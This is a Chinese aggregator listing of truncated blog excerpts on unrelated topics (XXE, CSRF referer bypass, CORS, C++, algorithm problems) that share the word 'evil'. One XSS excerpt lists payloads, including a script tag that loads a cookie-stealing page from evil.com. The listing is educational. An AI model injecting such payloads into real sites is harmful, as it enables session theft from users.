XXE XXE漏洞的文章网上就很多了 文件读取 内网探测 命令执行 Dos攻击 Blind XXE payload http://www.xxx.com/evil 复现 容器启动后先看一下其中的代码 从php://input读取数据,直接post就行 参考: "浅谈XXE漏洞攻击与防御" ...
分类:
Web程序 时间:
2019-01-13 12:27:02
阅读次数:
254
一、 实验目的 1.理解C语言程序的机器级表示。 2.初步掌握GDB调试器的用法。 3.阅读C编译器生成的x86-64机器代码,理解不同控制结构生成的基本指令模式,过程的实现。 二、实验工具 三、实验内容 登录bupt1服务器,在home目录下可以找到Evil博士专门为你量身定制的一个bomb,当运 ...
分类:
移动开发 时间:
2018-12-13 01:10:20
阅读次数:
639
对referer做校验一般是对csrf进行防范的手段之一,但是很多时候不经意间还会增加其他攻击的难度,如xss,jsonp劫持等等。 这里对referer的绕过做一个小的总结:目标网站是:www.domain.com 攻击者的域名是:evil.com 1.使用子域名的方式绕过,如下: http:// ...
分类:
其他好文 时间:
2018-12-05 00:16:15
阅读次数:
291
web跨域请求 1.为什么要有跨域限制 举个例子: 1.用户登录了自己的银行页面 http://mybank.com,http://mybank.com向用户的cookie中添加用户标识。 2.用户浏览了恶意页面 http://evil.com。执行了页面中的恶意AJAX请求代码。 3.http:/ ...
分类:
其他好文 时间:
2018-11-27 22:08:06
阅读次数:
209
Mahmoud and Ehab continue their adventures! As everybody in the evil land knows, Dr. Evil likes bipartite graphs, especially trees. A tree is a connec ...
分类:
其他好文 时间:
2018-10-18 01:04:36
阅读次数:
160
1.<script> alert(1);</script> 2.<script>alert('xss');</script> 3.<script src="http://www.evil.com/cookie.php"></script> 4.<script>location.href="http: ...
分类:
其他好文 时间:
2018-09-08 22:33:33
阅读次数:
288
Is it legal (and moral) for a member function to say delete this? As long as you’re careful, it’s okay (not evil) for an object to commit suicide (del ...
分类:
编程语言 时间:
2018-08-03 10:40:19
阅读次数:
254
//来自:https://softwareengineering.stackexchange.com/questions/148108/why-is-global-state-so-evil 首先,全局变量让程序的状态变得不可预测。 详细地说,比如有两个对象都用到了同一个全局变量,但是假设我们没有用 ...
分类:
其他好文 时间:
2018-07-14 18:24:17
阅读次数:
196
描述A lot of battleships of evil are arranged in a line before the battle. Our commander decides to use our secret weapon to eliminate the battleships. ...
分类:
其他好文 时间:
2018-07-09 00:34:07
阅读次数:
182
一、在Vue、react项目开发中集成了基于webpack的热更新,使用gulp等构建工具也会有类似热更新机制。二、在jquery的传统项目中实现热更新可以使用--Live.js 1. 官网--http://livejs.com/ github--https://github.com/Q42/Liv ...
分类:
Web程序 时间:
2018-06-14 18:14:41
阅读次数:
494
